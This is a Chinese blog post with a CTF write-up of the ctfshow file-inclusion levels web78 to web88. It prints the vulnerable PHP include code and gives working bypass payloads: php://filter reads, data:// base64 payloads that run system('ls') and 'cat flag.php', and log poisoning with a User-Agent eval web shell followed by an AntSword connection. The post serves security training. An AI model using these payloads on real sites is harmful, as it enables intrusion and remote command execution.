【ctfshow】文件包含练习2

最新推荐文章于 2024-06-01 12:50:49 发布
最新推荐文章于 2024-06-01 12:50:49 发布
阅读量2.1k 收藏 2
点赞数 2
分类专栏: 刷题记录 文章标签: php 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61109509/article/details/122872703
版权

目录

web78

解法一

解法二

web79

解法一

 解法二

 web80

 web81

web88

web78

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}

解法一

用include包含

/?file=php://filter/read=convert.base64-encode/resource=flag.php

解法二

php://input + POST

 

 

web79

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

解法一

str_replace() 函数替换字符串中的一些字符(区分大小写) 

 

 

 解法二

str_replace:将php替换成???,因此php伪协议不能用了,换成data协议

 

 

data://text/plain;base64,PD9waHAgc3lzdGVtKCdscycpOw==
<?php system('ls');	?>#flag.php index.php
data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=
<?php system('cat flag.php'); ?>

 web80

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

大小写绕过str_replace()
open_basedir对system等函数无效 

 

 web81

看提示

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

连:都被过滤了。用日志getshell

日志文件include
原理:对网站进行访问时,日志文件会记录相关信息(请求头中的信息)
前提:知道日志文件所在,并能进行包含
步骤:
先访问网站在请求头中写入一句话(一般写在user-agent中)
然后通过post去尝试执行
执行成功后通过蚁剑连接得到shell

 

UA头命令执行,日志文件包含getshell
日志文件的路径:/var/log/nginx/access.log
User-Agent头构造代码:<?php @eval($_POST['chopper']); ?>

 

 

从目录里面找到flag

web88

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    if(preg_match("/php|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\./i", $file)){
        die("error");
    }
    include($file);
}else{
    highlight_file(__FILE__);
}

 没有过滤:/  可以用data协议,但要注意的是过滤了= 删去即可

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdscycpOw
<?php system('ls');	?>#flag.php index.php
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmwwZy5waHAnKTsgPz4
<?php system('cat fl0g.php'); ?>

pipasound
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
web入门-文件包含
wo41ge的博客
11-28 3298
web78~php伪协议 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 直接payload ?file=php://filter/read=convert.base64-encode/resource=flag.php web79~Data协议 <?php if(isset($_GET['file
[CTFSHOW]文件包含78-88
Huamang的博客
03-07 533
web 78 php伪协议 payload: file=php://filter/read=convert.base64-encode/resource=flag.php web 79 data协议,用base64编码绕过过滤 payload: file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
file_include(攻防世界)
m0_56107268的博客
11-14 7179
php转化器的学习
CTFshow web 文件包含
m0_56993542的博客
10-18 392
web 78 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 文件包含伪协议,没有过滤。 ?file=php://filter/read=convert.base64-encode/resource=flag.php 拿到flag的base64编码,直接去解码。 web 79 if(isset($_GET['file'])){
【CTF Web】BUUCTF BUU LFI COURSE 1 Writeup(代码审计+PHP+文件包含漏洞)
最新发布
HEX9CF的技术博客
06-01 595
1点击启动靶机。
CTFshow web入门——文件包含
小元砸的博客
02-07 3524
Web 78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 一.分析代码: 使用 include进行了文件包含 二.解题过程: 构造playload: ?file=php://filter/read=convert.base64-encode/resource=flag.php Web 79 <?p
CTFSHOW-文件包含
Monica的博客
09-12 5812
WEB78 题目: <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 知识点:php伪协议 php://filter可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行。从而导致 任意文件读取。 1、php://input
CTFSHOW文件包含
Yb_140的博客
04-06 4591
服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,您只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一下菜单文件(而不是更新所有网页中的链接) 文件包含函数: 函数 区别 require() 在包含的过程中如果出现错误,会直接报错并退出程序的执行 include() 在包含的过程中如果出现错误,会抛出一个警告,程
ctfshow-文件包含&文件上传(详解)
qq_50589021的博客
07-20 4027
文件包含 web78-79 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } ?> 伪协议: ?file=php://filter/read=convert.base64-encode/resource=flag.php ?file=data://text/plain;base64,PD9waHAgc3lzd
CTFShow文件包含(web78-88)
lonmar的博客
11-28 3033
web78 php://input + POSTdata命令执行 ?file=php://filter/convert.base64-encode/resource=flag.php web79 大小写绕过str_replace str_replace() 函数替换字符串中的一些字符(区分大小写)。 2. data:// ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= web80 大小写
WP2-ctfshow
02-24
2
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTFSHOW web193 left标注盲注脚本
05-04
其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,包括数据库名、表名、列名和 flag 的值。在获取每个字符时,它会枚举 flag 可能的字符,逐个尝试,直到找到正确的字符为止。最终,它会输出获取到的...
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
ctf刷题小结
quan9i的博客
05-15 6299
CTF刷题小记,文章同步于我的个人博客,欢迎大家访问
ctf 命令执行总结
njqfb的博客
06-04 2828
命令执行绕过总结 linux系统查看文件命令 more 一页一页的显示文件内容 less 和more类似 head 只显示头几行 tail 只显示最后几行 nl 显示时还输出行号 tailf cat 由第一行开始显示内容,并将所有内容输出 tac 从最后一行倒序显示内容,并将所有内容输出 od 以二进制的方式读取内容 vi 编辑文件 vim 编辑文件,是vi的升级版 sort 将以默认的方式将文本文件的第一列以ASCI
PHP反序列化漏洞之产生原因(题目练习
qq_60463414的博客
08-13 3101
PHP反序列化漏洞之简单的题目练习
ctfshow文件包含-超详解
qq_50589021的博客
08-05 1976
文件包含 web78-79 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } ?> 伪协议: ?file=php://filter/read=convert.base64-encode/resource=flag.php ?file=data://text/plain;base64,PD9waHAgc3lzd
ctfshow 文件包含
07-28
- *1* *2* *3* [ctfshow文件包含](https://blog.csdn.net/njh18790816639/article/details/115582591)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值